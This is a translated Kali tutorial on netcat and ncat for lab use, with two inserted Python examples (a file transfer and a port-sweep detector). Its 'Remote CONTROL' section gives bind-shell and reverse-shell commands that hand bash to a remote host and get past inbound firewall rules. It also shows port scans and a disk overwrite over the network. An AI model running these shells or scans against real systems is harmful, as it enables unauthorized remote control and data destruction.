Kali penetration test 1-netcat

Source: Internet
Author: User
Tags lua mcrypt ssl certificate

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

(From the GNU Netcat official homepage.)

Help information:

nc -h

connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
    -c shell commands   as `-e'; use /bin/sh to exec [dangerous!!]
    -e filename         program to exec after connect [dangerous!!]
    -b                  allow broadcasts
    -g gateway          source-routing hop point[s], up to 8
    -G num              source-routing pointer: 4, 8, 12, ...
    -h                  this cruft
    -i secs             delay interval for lines sent, ports scanned
    -k                  set keepalive option on socket
    -l                  listen mode, for inbound connects
    -n                  numeric-only IP addresses, no DNS
    -o file             hex dump of traffic
    -p port             local port number
    -r                  randomize local and remote ports
    -q secs             quit after EOF on stdin and delay of secs
    -s addr             local source address
    -T tos              set Type Of Service
    -t                  answer TELNET negotiation
    -u                  UDP mode
    -v                  verbose [use twice to be more verbose]
    -w secs             timeout for connects and final net reads
    -C                  Send CRLF as line-ending
    -z                  zero-I/O mode [used for scanning]

  

A: Server IP 192.168.192.144

B: Client IP 192.168.192.100

1. Normal port connection

nc -nv 192.168.192.144 80   # connect to port 80 on server A (-n: no DNS lookup, -v: verbose)

Direct communication:

Server A: nc -l -p 333   # open port 333 and listen for an inbound connection

Client B: nc -nv 192.168.192.144 333   # connect to A; whatever either side types is sent to the other

2. Transferring text messages

Server A: nc -l -p 333

Client B: ls -l | nc -nv 192.168.192.144 333   # B's directory listing is sent to A and displayed there

Server A: nc -l -p 333 > message.txt   # save whatever arrives to a file instead of the terminal

Client B: ps aux | grep ssh | nc -nv 192.168.192.144 333 -q 1   # send B's ssh process list to A

3. Transferring files

Server A: nc -l -p 333 > from_b.mp4   # receiving side

Client B: nc -nv 192.168.192.144 333 < my.mp4 -q 1   # sending side

-q 1: quit 1 second after stdin reaches EOF, i.e. once the file has been sent; without it the connection stays open after the transfer.

The direction can also be reversed, with the listener sending the file:

Server A: nc -l -p 333 < a.mp4 -q 1   # sending side

Client B: nc -nv 192.168.192.144 333 > from_a.mp4   # receiving side

nc adds no integrity check of its own, so compare a checksum (for example sha256sum) of the file on both ends after the transfer.
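The two sides of a netcat file transfer, written out in Python as an added example (this is not code from the page, and it does not need nc installed): the receiver does what "nc -l -p PORT > file" does, the sender does what "nc HOST PORT < file -q 1" does, and both ends hash the data so the transfer can be verified. The payload, file names and the loopback port are constructed for the demo; the point it shows that the commands alone do not is why -q 1 matters: the receiver only stops when the sender closes its write side (shutdown), which is what -q 1 does for nc after stdin hits EOF.

```python
import hashlib
import os
import socket
import tempfile
import threading

# Constructed stand-in for my.mp4: 16 KiB of binary data (not a file from the page).
SAMPLE_DATA = bytes(range(256)) * 64


def sha256_of(path):
    """Hash a file the way `sha256sum` would, in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def expected_digest():
    """Digest of the constructed payload, for checking both ends against."""
    return hashlib.sha256(SAMPLE_DATA).hexdigest()


def receive_to_file(listener, dest_path):
    """Receiver, equivalent to `nc -l -p PORT > dest`: accept one connection
    and copy bytes to dest until the peer signals end of stream."""
    conn, _peer = listener.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:      # b"" means the sender closed its write side (EOF)
                break
            out.write(chunk)
    return sha256_of(dest_path)


def send_file(host, port, src_path):
    """Sender, equivalent to `nc -nv HOST PORT < src -q 1`. shutdown(SHUT_WR)
    is the explicit form of what -q does: once the file is sent, close the
    write side so the receiver sees EOF instead of waiting forever."""
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)
    return sha256_of(src_path)


def transfer_demo():
    """Run receiver and sender over loopback; return (sent digest, received digest)."""
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "my.bin")       # constructed file names
    dst = os.path.join(tmp, "from_b.bin")
    with open(src, "wb") as f:
        f.write(SAMPLE_DATA)

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))         # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(
        target=lambda: result.setdefault("recv", receive_to_file(listener, dst)))
    receiver.start()
    sent = send_file("127.0.0.1", port, src)
    receiver.join()
    listener.close()
    return sent, result["recv"]


if __name__ == "__main__":
    sent, received = transfer_demo()
    print("sha256 sent    ", sent)
    print("sha256 received", received)
    print("OK" if sent == received else "MISMATCH")
```

Leave out the shutdown call and the receiver's recv loop never returns b"", which is exactly the hang seen when nc is run without -q.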

4. Transfer Directory

A: tar -cvf - notebooks/ | nc -l -p 333 -q 1   # pack the directory to stdout and serve it on port 333

B: nc -nv 192.168.192.144 333 | tar -xvf -   # receive the stream and unpack it

5. Transferring encrypted files

A: nc -l -p 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > from_b.mp4   # receive and decrypt (-d)

B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < my.mp4 | nc -nv 192.168.192.144 333 -q 1   # encrypt and send

mcrypt asks for the passphrase on each side; -b omits the header, -q suppresses messages and -F flushes output as it is produced so the stream is not buffered. Note that ECB mode encrypts identical blocks identically and so leaks patterns in the plaintext; where the receiving side supports it, a chained mode such as CBC is a better choice.

6. Streaming Media Services

A: cat a.mp4 | nc -l -p 333   # streaming server

B: nc -nv 192.168.192.144 333 | mplayer -vo x11 -cache 3000 -   # play the stream as it arrives

MPlayer is a command-line media player; the trailing "-" tells it to read from stdin, and -cache 3000 buffers 3000 KiB before playback starts.

7. Port Scan

nc -nvz 192.168.192.144 1-1024   # scan ports 1-1024 on A; TCP is the default (-z: zero-I/O, just report whether each port connects)

nc -nvzu 192.168.192.144 1-1024   # scan UDP ports
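A scan like "nc -nvz A 1-1024" is easy to see from the other side: one source touching many distinct ports on one host within seconds. The Python below is an added example (not from the page) of that detection logic run over constructed iptables-style log lines; the hosts, ports and timestamps are made up for the demo, and the threshold and window are assumptions to tune for your own network.

```python
import re
from collections import defaultdict
from datetime import datetime

# Regex for iptables LOG lines as syslog writes them ("SRC=... DST=... PROTO=... DPT=...").
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\w+) .*DPT=(?P<dport>\d+)")


def sample_log_lines():
    """Constructed log sample (not real data): 10.0.0.50 sweeps 40 ports on A
    within two seconds, while 192.168.192.100 opens three ordinary connections
    spread over a minute."""
    lines = []
    for i, port in enumerate(range(1, 41)):
        lines.append(f"Apr 23 10:00:{i // 20:02d} gw kernel: IN=eth0 OUT= "
                     f"SRC=10.0.0.50 DST=192.168.192.144 PROTO=TCP SPT={40000 + i} DPT={port} SYN")
    for i, port in enumerate((22, 80, 443)):
        lines.append(f"Apr 23 10:00:{i * 20:02d} gw kernel: IN=eth0 OUT= "
                     f"SRC=192.168.192.100 DST=192.168.192.144 PROTO=TCP SPT={50000 + i} DPT={port} SYN")
    return lines


def parse_line(line, year=2018):
    """Return (timestamp, src, dst, proto, dport) or None for non-matching lines.
    Syslog omits the year, so it is supplied by the caller."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["dst"], m["proto"], int(m["dport"])


def detect_sweeps(lines, min_ports=20, window_seconds=10):
    """Flag any source that hits at least min_ports distinct destination ports
    on a single host inside a window_seconds-wide sliding window.
    Returns {src: (dst, distinct_ports_in_window)}."""
    events = defaultdict(list)            # (src, dst) -> [(ts, dport), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, _proto, dport = parsed
            events[(src, dst)].append((ts, dport))

    alerts = {}
    for (src, dst), evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            # Distinct ports seen from this event until the window closes.
            ports = {p for t, p in evs[i:] if (t - start).total_seconds() <= window_seconds}
            if len(ports) >= min_ports:
                alerts[src] = (dst, len(ports))
                break                     # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, (dst, n) in detect_sweeps(sample_log_lines()).items():
        print(f"port sweep: {src} touched {n} distinct ports on {dst}")
```

The same grouping works on firewall, NetFlow or Zeek conn logs once the parser is swapped; the window scan is quadratic per source, which is fine for a batch check but would want a two-pointer walk for a live feed.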

8. Remote hard disk/memory clone

A: nc -l -p 333 | dd of=/dev/sda   # write the received image over A's disk; this destroys whatever is on it, so run it from a live system rather than from the disk being written

B: dd if=/dev/sda | nc -nv 192.168.192.144 333 -q 1   # stream B's disk to A

9. Remote CONTROL

B controls A (B connects to A):

A: nc -l -p 333 -c bash   # run bash and attach it to the connection (the help text marks -c/-e "dangerous" for a reason)

B: nc 192.168.192.144 333

Note:

If A's firewall blocks all inbound ports, B cannot control A by connecting to it. Instead B opens and listens on port 333, and A makes the outbound connection to B:

B controls A (A connects out to B):

A: nc 192.168.192.100 333 -c bash

B: nc -l -p 333

nc has no encryption and no authentication, so everything it carries crosses the network in plaintext. ncat, the netcat reimplementation that ships with Nmap, addresses both:

Usage: ncat [options] [hostname] [port]

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -U, --unixsock             Use Unix domain sockets only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec <command>    Executes the given command via /bin/sh
  -e, --exec <command>       Executes the given command
      --lua-exec <filename>  Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G <n>                     Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns <n>        Maximum <n> simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay <time>         Wait between read/writes
  -o, --output <filename>    Dump session data to a file
  -x, --hex-dump <filename>  Dump session data as hex to a file
  -i, --idle-timeout <time>  Idle read/write timeout
  -p, --source-port port     Specify source port to use
  -s, --source addr          Specify source address to use (doesn't affect -l)
  -l, --listen               Bind and listen for incoming connections
  -k, --keep-open            Accept multiple connections in listen mode
  -n, --nodns                Do not resolve hostnames via DNS
  -t, --telnet               Answer Telnet negotiations
  -u, --udp                  Use UDP instead of default TCP
      --sctp                 Use SCTP instead of default TCP
  -v, --verbose              Set verbosity level (can be used several times)
  -w, --wait <time>          Connect timeout
  -z                         Zero-I/O mode, report connection status only
      --append-output        Append rather than clobber specified output files
      --send-only            Only send data, ignoring received; quit on EOF
      --recv-only            Only receive data, never send anything
      --allow                Allow only given hosts to connect to Ncat
      --allowfile            A file of hosts allowed to connect to Ncat
      --deny                 Deny given hosts from connecting to Ncat
      --denyfile             A file of hosts denied from connecting to Ncat
      --broker               Enable Ncat's connection brokering mode
      --chat                 Start a simple Ncat chat server
      --proxy <addr[:port]>  Specify address of host to proxy through
      --proxy-type <type>    Specify proxy type ("http" or "socks4" or "socks5")
      --proxy-auth <auth>    Authenticate with HTTP or SOCKS proxy server
      --ssl                  Connect or listen with SSL
      --ssl-cert             Specify SSL certificate file (PEM) for listening
      --ssl-key              Specify SSL private key (PEM) for listening
      --ssl-verify           Verify trust and domain name of certificates
      --ssl-trustfile        PEM file containing trusted SSL certificates
      --ssl-ciphers          Cipherlist containing SSL ciphers to use
      --ssl-alpn             ALPN protocol list to use
      --version              Display Ncat's version information and exit

A:

Ncat-c Bash--allow 192.168.192.100-vnl 333--ssl #允许192.168.192.100 Connect SSL Encryption

B:

NCAT-NV 192.168.192.144 333--ssl


Reprint please indicate the source.

Posted on 2018-04-23
